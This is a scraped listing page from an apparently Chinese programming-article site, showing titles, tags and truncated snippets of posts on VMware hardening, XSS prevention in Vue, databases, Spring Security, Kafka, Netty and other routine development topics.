<a class="tag" taget="_blank" href="/search/VMware/1.htm">VMware</a><a class="tag" taget="_blank" href="/search/VMware/1.htm">VMware</a><a class="tag" taget="_blank" href="/search/ESXi/1.htm">ESXi</a><a class="tag" taget="_blank" href="/search/vCenter/1.htm">vCenter</a><a class="tag" taget="_blank" href="/search/vSphere/1.htm">vSphere</a><a class="tag" taget="_blank" href="/search/%E4%BA%91%E6%A1%8C%E9%9D%A2/1.htm">云桌面</a><a class="tag" taget="_blank" href="/search/%E8%99%9A%E6%8B%9F%E5%8C%96/1.htm">虚拟化</a>
                        <div>哈喽大家好，欢迎来到虚拟化时代君（XNHCYL），收不到通知请将我点击星标！“大家好，我是虚拟化时代君，一位潜心于互联网的技术宅男。这里每天为你分享各种你感兴趣的技术、教程、软件、资源、福利…（每天更新不间断，福利不见不散）第一章、引言最近私信比较频繁，很多兄弟们想要VMwarevCenter和ESXi常见高危端口的修改方法，以及安全加固措施。今天粗略整理一些，望大家指正！第二章、vCenter和</div>
                    </li>
                    <li><a href="/article/1891553816529137664.htm"
                           title="使用v-html时 防止xss注入攻击" target="_blank">使用v-html时 防止xss注入攻击</a>
                        <span class="text-muted">i'm wxm</span>
<a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/vue/1.htm">vue</a>
                        <div>方法一使用vue-dompurify-html插件安装npminstallvue-dompurify-html在mian.js中配置import{createApp}from'vue'importAppfrom'./App.vue'constapp=createApp(App)//防止v-html进行xss注入importVueDOMPurifyHTMLfrom'vue-dompurify-htm</div>
                    </li>
                    <li><a href="/article/1891549397901176832.htm"
                           title="MySQL、MariaDB 和 TDSQL 的区别" target="_blank">MySQL、MariaDB 和 TDSQL 的区别</a>
                        <span class="text-muted">sumatch</span>
<a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a>
                        <div>MySQL、MariaDB和TDSQL是三种不同的数据库管理系统，它们在设计理念、功能、性能和使用场景上有一些显著的区别。以下是对这三者的详细比较和介绍。1.MySQL概述类型：关系型数据库管理系统（RDBMS）。开发者：最初由MySQLAB开发，后被SunMicrosystems收购，最终被OracleCorporation收购。开源：提供社区版和商业版。使用场景：广泛用于Web应用、内容管理系</div>
                    </li>
                    <li><a href="/article/1891537900521189376.htm"
                           title="选择开发代码审计工具的编程语言需要结合具体场景和技术需求，不同语言在性能、生态、开发效率等方面各有优劣" target="_blank">选择开发代码审计工具的编程语言需要结合具体场景和技术需求，不同语言在性能、生态、开发效率等方面各有优劣</a>
                        <span class="text-muted">rockmelodies</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E4%BB%A3%E7%A0%81%E5%A4%8D%E5%AE%A1/1.htm">代码复审</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%9E%B6%E6%9E%84/1.htm">安全架构</a>
                        <div>选择开发代码审计工具的编程语言需要结合具体场景和技术需求，不同语言在性能、生态、开发效率等方面各有优劣。以下是主要语言的对比及适用场景：1.Python优势：快速开发：语法简洁，适合快速搭建原型或小型工具。文本处理：正则表达式和字符串操作能力极强，适合模式匹配（如漏洞规则扫描）。丰富生态：有Bandit、Semgrep（部分组件）等成熟工具的底层支持，可直接调用现成的安全分析库。跨语言支持：通过抽</div>
                    </li>
                    <li><a href="/article/1891532477491638272.htm"
                           title="【最新】沃德协会管理系统源码+uniapp前端+环境教程" target="_blank">【最新】沃德协会管理系统源码+uniapp前端+环境教程</a>
                        <span class="text-muted">kaui52066</span>
<a class="tag" taget="_blank" href="/search/kaui52066%E7%B2%BE%E5%93%81%E6%BA%90%E7%A0%81/1.htm">kaui52066精品源码</a><a class="tag" taget="_blank" href="/search/uni-app/1.htm">uni-app</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E6%BA%90/1.htm">开源</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/%E7%94%9F%E6%B4%BB/1.htm">生活</a>
                        <div>一.系统介绍一款基于FastAdmin+ThinkPHP+Uniapp开发的商协会系统，新一代数字化商协会运营管理系统，以“智慧化会员体系、智敏化内容运营、智能化活动构建”三大板块为基点，实施功能全场景覆盖，一站式解决商协会需求壁垒，有效快速建立自有数字化管理体系、提升组织管理效能、增强会员粘性、沟通连接市场，真正做到为构建有影响力的现代化智慧型组织赋能。二.测试环境系统环境：CentOS、运行环</div>
                    </li>
                    <li><a href="/article/1891530328141524992.htm"
                           title="【花雕学编程】ESP32 DeepSeek 之带样式的Web聊天机器人" target="_blank">【花雕学编程】ESP32 DeepSeek 之带样式的Web聊天机器人</a>
                        <span class="text-muted">驴友花雕</span>
<a class="tag" taget="_blank" href="/search/%E5%BC%80%E6%BA%90%E7%A1%AC%E4%BB%B6/1.htm">开源硬件</a><a class="tag" taget="_blank" href="/search/%E6%9C%BA%E5%99%A8%E4%BA%BA/1.htm">机器人</a><a class="tag" taget="_blank" href="/search/%E5%B5%8C%E5%85%A5%E5%BC%8F%E7%A1%AC%E4%BB%B6/1.htm">嵌入式硬件</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E7%89%87%E6%9C%BA/1.htm">单片机</a><a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a><a class="tag" taget="_blank" href="/search/%E5%B8%A6%E6%A0%B7%E5%BC%8F%E7%9A%84Web%E8%81%8A%E5%A4%A9%E6%9C%BA%E5%99%A8%E4%BA%BA/1.htm">带样式的Web聊天机器人</a><a class="tag" taget="_blank" href="/search/ESP32/1.htm">ESP32</a><a class="tag" taget="_blank" href="/search/DeepSeek/1.htm">DeepSeek</a>
                        <div>Arduino是一个开放源码的电子原型平台，它可以让你用简单的硬件和软件来创建各种互动的项目。Arduino的核心是一个微控制器板，它可以通过一系列的引脚来连接各种传感器、执行器、显示器等外部设备。Arduino的编程是基于C/C++语言的，你可以使用ArduinoIDE（集成开发环境）来编写、编译和上传代码到Arduino板上。Arduino还有一个丰富的库和社区，你可以利用它们来扩展Ardui</div>
                    </li>
                    <li><a href="/article/1891526904649936896.htm"
                           title="asp.net core系统记录当前在线人数" target="_blank">asp.net core系统记录当前在线人数</a>
                        <span class="text-muted">王焜棟琦</span>
<a class="tag" taget="_blank" href="/search/asp.net/1.htm">asp.net</a><a class="tag" taget="_blank" href="/search/core/1.htm">core</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a><a class="tag" taget="_blank" href="/search/asp.net/1.htm">asp.net</a><a class="tag" taget="_blank" href="/search/core/1.htm">core</a>
                        <div>实时记录当前在线人数，登录后保持120秒在线状态，在线状态保存在缓存中，采用滑动过期，在120秒内请求了系统，自动续活120秒；超过时间则移除用户在线状态；需要在登录过滤器标记用户在线状态需要排除循环请求的url，比如定时请求的待办数量登录成功后标记用户在线web记录当前在线人数状态usingSystem;usingSystem.Collections.Generic;usingSystem.Li</div>
                    </li>
                    <li><a href="/article/1891521608829431808.htm"
                           title="[1138]基于JAVA的安全监管网络人员信息智慧管理系统的设计与实现" target="_blank">[1138]基于JAVA的安全监管网络人员信息智慧管理系统的设计与实现</a>
                        <span class="text-muted">阿鑫学长【毕设工场】</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E8%AF%BE%E7%A8%8B%E8%AE%BE%E8%AE%A1/1.htm">课程设计</a><a class="tag" taget="_blank" href="/search/%E6%AF%95%E4%B8%9A%E8%AE%BE%E8%AE%A1/1.htm">毕业设计</a>
                        <div>毕业设计（论文）开题报告表姓名学院专业班级题目基于JAVA的安全监管网络人员信息智慧管理系统的设计与实现指导老师（一）选题的背景和意义选题背景与意义：随着信息技术的飞速发展和大数据时代的到来，安全监管网络人员信息管理面临着前所未有的挑战与机遇。当前，执法人员、监督员以及各类从业人员的信息档案管理工作日益繁重，传统的人工管理模式效率低下、易出错且难以满足实时更新、精准查询的需求。特别是在复杂的执法环</div>
                    </li>
                    <li><a href="/article/1891508614133248000.htm"
                           title="ABB机器人的二次开发" target="_blank">ABB机器人的二次开发</a>
                        <span class="text-muted">Mountain and sea</span>
<a class="tag" taget="_blank" href="/search/%E6%9C%BA%E5%99%A8%E4%BA%BA/1.htm">机器人</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/c%E8%AF%AD%E8%A8%80/1.htm">c语言</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E5%8C%96/1.htm">自动化</a>
                        <div>ABB机器人的二次开发可以通过多种方式实现，主要涉及编程接口、通信协议和开发工具。以下是详细的步骤和方法：1.基础准备确认RobotWare选项：确保机器人控制器安装了必要的选项，如：PCInterface（用于PCSDK通信）RobotWebServices（RESTAPI支持）Fieldbus选项（如Profinet、EtherNet/IP）权限设置：在示教器上将用户权限设置为“专家模式”或更</div>
                    </li>
                    <li><a href="/article/1891506596782075904.htm"
                           title="在Hadoop集群中实现数据安全：技术与策略并行" target="_blank">在Hadoop集群中实现数据安全：技术与策略并行</a>
                        <span class="text-muted">Echo_Wish</span>
<a class="tag" taget="_blank" href="/search/%E5%AE%9E%E6%88%98%E9%AB%98%E9%98%B6%E5%A4%A7%E6%95%B0%E6%8D%AE/1.htm">实战高阶大数据</a><a class="tag" taget="_blank" href="/search/hadoop/1.htm">hadoop</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E6%95%B0%E6%8D%AE/1.htm">大数据</a><a class="tag" taget="_blank" href="/search/%E5%88%86%E5%B8%83%E5%BC%8F/1.htm">分布式</a>
                        <div>在Hadoop集群中实现数据安全：技术与策略并行随着大数据技术的广泛应用，Hadoop已经成为处理和存储海量数据的首选平台。然而，随着数据规模的扩大，如何确保Hadoop集群中的数据安全也成为了亟待解决的难题。毕竟，数据安全不仅关系到企业的隐私保护，也直接影响到数据的可信度与可用性。本文将探讨如何在Hadoop集群中实现数据安全，分析数据加密、访问控制、审计日志等方面的技术与策略，并通过一些具体的</div>
                    </li>
                    <li><a href="/article/1891506595242766336.htm"
                           title="用AI提升电商平台的客户体验：从个性化推荐到智能客服" target="_blank">用AI提升电商平台的客户体验：从个性化推荐到智能客服</a>
                        <span class="text-muted">Echo_Wish</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E6%B2%BF%E6%8A%80%E6%9C%AF/1.htm">前沿技术</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
                        <div>用AI提升电商平台的客户体验：从个性化推荐到智能客服随着电商行业的竞争日益激烈，如何在海量商品中脱颖而出，吸引和保持客户的关注，成为平台生存和发展的关键。而在这场竞争中，人工智能（AI）正在发挥着越来越重要的作用。AI不仅可以优化电商平台的后台操作，还能在前端提供更为个性化、智能化的客户体验，让消费者感受到前所未有的便捷与高效。本文将从个性化推荐、智能客服、智能搜索等方面，详细探讨如何通过AI技术</div>
                    </li>
                    <li><a href="/article/1891504450468638720.htm"
                           title="SpringSecurity+JWT实现认证及授权详细步骤" target="_blank">SpringSecurity+JWT实现认证及授权详细步骤</a>
                        <span class="text-muted">小孙的Blog</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a>
                        <div>表单认证流程想要实现SpringSecurity的认证授权，首先需要理解大致流程。准备工作导入maven依赖org.springframework.bootspring-boot-starter-securityio.jsonwebtokenjjwt0.9.0创建数据库表表数据如下：创建生成jwtToken的工具类importio.jsonwebtoken.Claims;importio.json</div>
                    </li>
                    <li><a href="/article/1891503442095042560.htm"
                           title="Golang的代码质量评估" target="_blank">Golang的代码质量评估</a>
                        <span class="text-muted">苹果酱0567</span>
<a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95%E9%A2%98%E6%B1%87%E6%80%BB%E4%B8%8E%E8%A7%A3%E6%9E%90/1.htm">面试题汇总与解析</a><a class="tag" taget="_blank" href="/search/%E8%AF%BE%E7%A8%8B%E8%AE%BE%E8%AE%A1/1.htm">课程设计</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/layui/1.htm">layui</a><a class="tag" taget="_blank" href="/search/%E6%AF%95%E4%B8%9A%E8%AE%BE%E8%AE%A1/1.htm">毕业设计</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>Golang的代码质量评估一、代码质量的重要性在软件开发过程中，代码质量是至关重要的，它直接关系到软件的稳定性、可维护性和安全性。而Golang作为一门快速发展的编程语言，其代码质量也备受关注。因此，对Golang代码的质量进行评估至关重要。二、静态代码分析工具在评估Golang代码质量时，我们可以使用静态代码分析工具来帮助我们发现潜在的问题。其中比较知名的工具包括：是Golang的官方静态代码分</div>
                    </li>
                    <li><a href="/article/1891501925036257280.htm"
                           title="HTML、Vue和PHP文件的区别与联系" target="_blank">HTML、Vue和PHP文件的区别与联系</a>
                        <span class="text-muted">生信天地</span>
<a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/vue.js/1.htm">vue.js</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a>
                        <div>一、核心区别类型性质执行环境功能特点.html静态标记语言浏览器直接解析定义页面结构和内容，无逻辑处理能力.vue前端框架组件文件浏览器/构建工具整合HTML模板+JS逻辑+CSS样式，支持动态数据绑定和组件化开发.php服务器端脚本语言文件Web服务器执行动态生成HTML内容，支持数据库操作和业务逻辑处理二、联系与协作PHP与HTMLPHP文件通过标签嵌入HTML，服务器执行PHP代码后输出纯H</div>
                    </li>
                    <li><a href="/article/1891500664517881856.htm"
                           title="springboot 上传图片 转存成webp" target="_blank">springboot 上传图片 转存成webp</a>
                        <span class="text-muted">键盘侠007</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/okhttp/1.htm">okhttp</a><a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                        <div>第一步先引入包org.sejda.imageiowebp-imageio0.1.6下面就是上传的时候处理的了/***通用上传请求（单个）*/@PostMapping("/upload")publicAjaxResultuploadFile(MultipartFilefile)throwsException{try{//上传文件路径StringfilePath=RuoYiConfig.getUplo</div>
                    </li>
                    <li><a href="/article/1891500029219237888.htm"
                           title="怎么把pyqt界面做的像web一样漂亮" target="_blank">怎么把pyqt界面做的像web一样漂亮</a>
                        <span class="text-muted">mosquito_lover1</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/pyqt/1.htm">pyqt</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>要将PyQt界面做得像网页一样漂亮，可以从以下几个方面入手：1.使用样式表（QSS）PyQt支持类似CSS的样式表（QSS），通过QSS可以自定义控件的外观。fromPyQt5.QtWidgetsimportQApplication,QPushButton,QWidget,QVBoxLayoutapp=QApplication([])window=QWidget()layout=QVBoxLayo</div>
                    </li>
                    <li><a href="/article/1891496371995865088.htm"
                           title="安全沙箱介绍" target="_blank">安全沙箱介绍</a>
                        <span class="text-muted">hao_wujing</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a>
                        <div>大家读完觉得有帮助，记得关注和点赞！！！一、安全沙箱介绍1、为什么需要安全沙箱？高级持续性威胁（APT）是指针对特定目标进行的复杂、精心策划的网络攻击，具有高度隐蔽性、持续性和复杂性等特点。这些特点使得APT攻击难以被传统安全措施检测到，因此对于网络安全分析而言，如何有效地识别和防御APT攻击具有重要意义。关于APT的具体介绍可以参考：APT攻击和防御《郑伯克段于鄢》的故事告诉我们，欲使敌人灭亡，</div>
                    </li>
                    <li><a href="/article/1891494733679751168.htm"
                           title="设置GaussDB实例安全组规则" target="_blank">设置GaussDB实例安全组规则</a>
                        <span class="text-muted">如清风一般</span>
<a class="tag" taget="_blank" href="/search/gaussdb/1.htm">gaussdb</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a>
                        <div>设置GaussDB实例安全组规则操作场景安全组是一个逻辑上的分组，为同一个虚拟私有云内具有相同安全保护需求，并相互信任的弹性云服务器和GaussDB实例提供访问策略。如果账号已经申请创建时支持不指定安全组的白名单，则不需要执行本章节，而且在实例详情页也不会有内网安全组信息。为了保障数据库的安全性和稳定性，在使用GaussDB实例之前，您需要设置安全组，开通需访问数据库的IP地址和端口。内网连接Ga</div>
                    </li>
                                <li><a href="/article/45.htm"
                                       title="安装数据库首次应用" target="_blank">安装数据库首次应用</a>
                                    <span class="text-muted">Array_06</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                                    <div>可是为什么再一次失败之后就变成直接跳过那个要求 
enter full pathname of java.exe的界面 
 
 
这个java.exe是你的Oracle 11g安装目录中例如：【F:\app\chen\product\11.2.0\dbhome_1\jdk\jre\bin】下的java.exe 。不是你的电脑安装的java jdk下的java.exe！ 
注意第一次，使用SQL D</div>
                                </li>
                                <li><a href="/article/172.htm"
                                       title="Weblogic Server Console密码修改和遗忘解决方法" target="_blank">Weblogic Server Console密码修改和遗忘解决方法</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/Welogic/1.htm">Welogic</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在工作中一同事将Weblogic的console的密码忘记了，通过网上查询资料解决，实践整理了一下。 
一.修改Console密码 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 打开weblogic控制台，安全领域&nbsp;--&gt; myrealm --&gt;&n</div>
                                </li>
                                <li><a href="/article/299.htm"
                                       title="IllegalStateException: Cannot forward a response that is already committed" target="_blank">IllegalStateException: Cannot forward a response that is already committed</a>
                                    <span class="text-muted">Cwind</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Servlets/1.htm">Servlets</a>
                                    <div>对于初学者来说，一个常见的误解是：当调用 forward() 或者 sendRedirect() 时控制流将会自动跳出原函数。标题所示错误通常是基于此误解而引起的。   示例代码：   
protected void doPost() {
    if (someCondition) {
        sendRedirect();
    }
    forward(); // Thi</div>
                                </li>
                                <li><a href="/article/426.htm"
                                       title="基于流的装饰设计模式" target="_blank">基于流的装饰设计模式</a>
                                    <span class="text-muted">木zi_鸣</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a>
                                    <div>当想要对已有类的对象进行功能增强时，可以定义一个类，将已有对象传入，基于已有的功能，并提供加强功能。 
自定义的类成为装饰类 
 
模仿BufferedReader，对Reader进行包装，体现装饰设计模式 
 
装饰类通常会通过构造方法接受被装饰的对象，并基于被装饰的对象功能，提供更强的功能。 
装饰模式比继承灵活，避免继承臃肿，降低了类与类之间的关系 
 
装饰类因为增强已有对象，具备的功能该</div>
                                </li>
                                <li><a href="/article/553.htm"
                                       title="Linux中的uniq命令" target="_blank">Linux中的uniq命令</a>
                                    <span class="text-muted">被触发</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                                    <div>Linux命令uniq的作用是过滤重复部分显示文件内容，这个命令读取输入文件，并比较相邻的行。在正常情 况下，第二个及以后更多个重复行将被删去，行比较是根据所用字符集的排序序列进行的。该命令加工后的结果写到输出文件中。输入文件和输出文件必须不同。如 果输入文件用“- ”表示，则从标准输入读取。 
AD： 
uniq [选项] 文件 
说明：这个命令读取输入文件，并比较相邻的行。在正常情况下，第二个</div>
                                </li>
                                <li><a href="/article/680.htm"
                                       title="正则表达式Pattern" target="_blank">正则表达式Pattern</a>
                                    <span class="text-muted">肆无忌惮_</span>
<a class="tag" taget="_blank" href="/search/Pattern/1.htm">Pattern</a>
                                    <div>正则表达式是符合一定规则的表达式，用来专门操作字符串，对字符创进行匹配，切割，替换，获取。 
&nbsp; 
例如，我们需要对QQ号码格式进行检验 
规则是长度6~12位 &nbsp;不能0开头 &nbsp;只能是数字，我们可以一位一位进行比较，利用parseLong进行判断，或者是用正则表达式来匹配[1-9][0-9]{4,14}&nbsp;或者&nbsp;[1-9]\d{4,14} 
&nbs</div>
                                </li>
                                <li><a href="/article/807.htm"
                                       title="Oracle高级查询之OVER (PARTITION BY ..)" target="_blank">Oracle高级查询之OVER (PARTITION BY ..)</a>
                                    <span class="text-muted">知了ing</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                                    <div>一、rank()/dense_rank() over(partition by ...order by ...) 
 
现在客户有这样一个需求，查询每个部门工资最高的雇员的信息，相信有一定oracle应用知识的同学都能写出下面的SQL语句： 
 
 select e.ename, e.job, e.sal, e.deptno  
  from scott.emp e,  
       (se</div>
                                </li>
                                <li><a href="/article/934.htm"
                                       title="Python调试" target="_blank">Python调试</a>
                                    <span class="text-muted">矮蛋蛋</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/pdb/1.htm">pdb</a>
                                    <div>原文地址： 
http://blog.csdn.net/xuyuefei1988/article/details/19399137 
1、下面网上收罗的资料初学者应该够用了，但对比IBM的Python 代码调试技巧： 
 
IBM：包括 pdb 模块、利用 PyDev 和 Eclipse 集成进行调试、PyCharm 以及 Debug 日志进行调试： 
 
http://www.ibm.com/d</div>
                                </li>
                                <li><a href="/article/1061.htm"
                                       title="webservice传递自定义对象时函数为空，以及boolean不对应的问题" target="_blank">webservice传递自定义对象时函数为空，以及boolean不对应的问题</a>
                                    <span class="text-muted">alleni123</span>
<a class="tag" taget="_blank" href="/search/webservice/1.htm">webservice</a>
                                    <div>今天在客户端调用方法 
NodeStatus status=iservice.getNodeStatus(). 
 
结果NodeStatus的属性都是null。 
 
进行debug之后，发现服务器端返回的确实是有值的对象。 
 
后来发现原来是因为在客户端，NodeStatus的setter全部被我删除了。 
本来是因为逻辑上不需要在客户端使用setter， 结果改了之后竟然不能获取带属性值的</div>
                                </li>
                                <li><a href="/article/1188.htm"
                                       title="java如何干掉指针，又如何巧妙的通过引用来操作指针————>说的就是java指针" target="_blank">java如何干掉指针，又如何巧妙的通过引用来操作指针————>说的就是java指针</a>
                                    <span class="text-muted">百合不是茶</span>

                                    <div>C语言的强大在于可以直接操作指针的地址，通过改变指针的地址指向来达到更改地址的目的,又是由于c语言的指针过于强大，初学者很难掌握， java的出现解决了c，c++中指针的问题 java将指针封装在底层，开发人员是不能够去操作指针的地址，但是可以通过引用来间接的操作： 
&nbsp; 
定义一个指针p来指向a的地址（&amp;是地址符号）： 
&nbsp; &nbsp; &nbsp; &nbsp; </div>
                                </li>
                                <li><a href="/article/1315.htm"
                                       title="Eclipse打不开，提示“An error has occurred.See the log file ***/.log”" target="_blank">Eclipse打不开，提示“An error has occurred.See the log file ***/.log”</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a>
                                    <div>打开eclipse工作目录的\.metadata\.log文件，发现如下错误： 
 
!ENTRY org.eclipse.osgi 4 0 2012-09-10 09:28:57.139 
!MESSAGE Application error 
!STACK 1 
java.lang.NoClassDefFoundError: org/eclipse/core/resources/IContai</div>
                                </li>
                                <li><a href="/article/1442.htm"
                                       title="spring aop实例annotation方法实现" target="_blank">spring aop实例annotation方法实现</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/AOP/1.htm">AOP</a><a class="tag" taget="_blank" href="/search/annotation/1.htm">annotation</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在spring aop实例中我们通过配置xml文件来实现AOP，这里学习使用annotation来实现，使用annotation其实就是指明具体的aspect,pointcut和advice。1.申明一个切面(用一个类来实现)在这个切面里,包括了advice和pointcut 
AdviceMethods.jav</div>
                                </li>
                                <li><a href="/article/1569.htm"
                                       title="[Velocity一]Velocity语法基础入门" target="_blank">[Velocity一]Velocity语法基础入门</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/velocity/1.htm">velocity</a>
                                    <div>用户和开发人员参考文档 
http://velocity.apache.org/engine/releases/velocity-1.7/developer-guide.html 
&nbsp; 注释 
1.行级注释## 
2.多行注释#*&nbsp; *# 
&nbsp; 变量定义 
使用$开头的字符串是变量定义，例如$var1, $var2, 
&nbsp; 赋值 
使用#set为变量赋值，例</div>
                                </li>
                                <li><a href="/article/1696.htm"
                                       title="【Kafka十一】关于Kafka的副本管理" target="_blank">【Kafka十一】关于Kafka的副本管理</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/kafka/1.htm">kafka</a>
                                    <div>1. 关于request.required.acks 
&nbsp; 
request.required.acks控制者Producer写请求的什么时候可以确认写成功，默认是0， 
0表示即不进行确认即返回。 
1表示Leader写成功即返回，此时还没有进行写数据同步到其它Follower Partition中 
-1表示根据指定的最少Partition确认后才返回，这个在 
&nbsp; 
Th</div>
                                </li>
                                <li><a href="/article/1823.htm"
                                       title="lua统计nginx内部变量数据" target="_blank">lua统计nginx内部变量数据</a>
                                    <span class="text-muted">ronin47</span>
<a class="tag" taget="_blank" href="/search/lua+nginx%E3%80%80+%E7%BB%9F%E8%AE%A1/1.htm">lua nginx　 统计</a>
                                    <div>server {
    listen 80;
    server_name photo.domain.com;
    location /{set $str $uri;
        content_by_lua '
            local url = ngx.var.uri
            local res = ngx.location.capture(</div>
                                </li>
                                <li><a href="/article/1950.htm"
                                       title="java-11.二叉树中节点的最大距离" target="_blank">java-11.二叉树中节点的最大距离</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>
import java.util.ArrayList;
import java.util.List;


public class MaxLenInBinTree {

	/*
	 a.			1
	 		   /  \
	 		  2    3
	 		 / \  / \
	 		4   5 6  7
	 	max=4	pass &quot;root&quot;
	 </div>
                                </li>
                                <li><a href="/article/2077.htm"
                                       title="Netty源码学习-ReadTimeoutHandler" target="_blank">Netty源码学习-ReadTimeoutHandler</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/netty/1.htm">netty</a>
                                    <div> 
ReadTimeoutHandler的实现思路： 
开启一个定时任务，如果在指定时间内没有接收到消息，则抛出ReadTimeoutException 
这个异常的捕获，在开发中，交给跟在ReadTimeoutHandler后面的ChannelHandler，例如 
 
 

private final ChannelHandler timeoutHandler =
	new ReadTim</div>
                                </li>
                                <li><a href="/article/2204.htm"
                                       title="jquery验证上传文件样式及大小(好用)" target="_blank">jquery验证上传文件样式及大小(好用)</a>
                                    <span class="text-muted">cngolon</span>
<a class="tag" taget="_blank" href="/search/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/1.htm">文件上传</a><a class="tag" taget="_blank" href="/search/jquery%E9%AA%8C%E8%AF%81/1.htm">jquery验证</a>
                                    <div>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
    &lt;script src=&quot;jquery1.8/jquery-1.8.0.</div>
                                </li>
                                <li><a href="/article/2331.htm"
                                       title="浏览器兼容【转】" target="_blank">浏览器兼容【转】</a>
                                    <span class="text-muted">cuishikuan</span>
<a class="tag" taget="_blank" href="/search/css/1.htm">css</a><a class="tag" taget="_blank" href="/search/%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">浏览器</a><a class="tag" taget="_blank" href="/search/IE/1.htm">IE</a>
                                    <div>浏览器兼容问题一：不同浏览器的标签默认的外补丁和内补丁不同 
 
问题症状：随便写几个标签，不加样式控制的情况下，各自的margin 和padding差异较大。 
 
碰到频率:100% 
 
